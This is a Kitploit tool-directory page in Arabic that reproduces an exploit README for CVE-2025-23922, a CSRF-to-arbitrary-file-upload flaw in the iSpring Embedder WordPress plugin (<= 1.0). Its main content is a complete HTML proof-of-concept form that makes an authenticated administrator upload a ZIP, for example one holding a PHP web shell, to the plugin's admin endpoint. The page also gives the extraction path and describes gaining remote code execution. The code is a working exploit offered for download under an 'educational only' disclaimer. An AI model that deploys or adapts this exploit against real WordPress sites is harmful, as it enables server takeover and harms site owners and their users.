Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-23922 — إضافة iSpring Embedder لـ WordPress <= 1.0 - ثغرة CSRF تؤدي إلى رفع ملفات عشوائي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-23922
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2025-23922

CVE-2025-23922

إضافة iSpring Embedder لـ WordPress <= 1.0 - ثغرة CSRF تؤدي إلى رفع ملفات عشوائي

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-23922 - ثغرة CSRF في WordPress iSpring Embedder تؤدي إلى رفع ملفات تعسفي

📌 تفاصيل CVE

  • معرّف CVE: CVE-2025-23922
  • تاريخ النشر: 2025-01-16
  • الإضافة المتأثرة: إضافة WordPress iSpring Embedder
  • الإصدارات المتأثرة: <= 1.0
  • مؤلف الإضافة: Harsh
  • نوع الثغرة: تزييف الطلبات عبر المواقع (CSRF) يؤدي إلى رفع ملفات تعسفي
  • معرّف CWE: CWE-352: تزييف الطلبات عبر المواقع (CSRF)
  • درجة CVSS: 10.0 (حرجة)
  • ناقل الهجوم: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 الوصف

تسمح ثغرة CSRF في إضافة iSpring Embedder لـ WordPress لمهاجم عن بُعد غير مصادَق بخداع مسؤول مصادَق لرفع ملفات تعسفية (مثل Web Shell بلغة PHP) إلى الخادم.

لا تطبّق الواجهة المعرّضة للخطر أي حماية من CSRF، كما تقبل ميزة رفع الملفات ملفات .zip، والتي يتم استخراجها إلى الموقع التالي:

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 التأثير

يمكن للمهاجم:

  • تفعيل رفع الملفات دون مصادقة.
  • الحصول على تنفيذ كود عن بُعد (RCE) عبر رفع ملف PHP خبيث داخل أرشيف ZIP.
  • اختراق الخادم بالكامل من خلال دمج هذا الاستغلال مع Web Shell مُصمَّمة خصيصًا.

🚀 استغلال إثبات المفهوم (PoC) (HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF File Upload Exploit</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF Exploit – File Upload</h1>

    <p>
      This is a proof-of-concept (PoC) exploit for the following vulnerability:
    </p>
    <ul>
      <li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
      <li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
      <li><strong>CVE:</strong> CVE-2025-23922</li>
      <li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
      <li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>Select ZIP file to upload:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
    </form>

    <div class="footer">
      <p>
        Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
        <strong>CVE-2025-23922</strong><br>
        Developed by <strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>


⚠️ إخلاء المسؤولية

إثبات المفهوم هذا مُقدَّم لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال.

Nxploit | Khaled Alenazi
باحث أمني ومطوّر استغلالات
https://github.com/Nxploit

تنزيل الأداة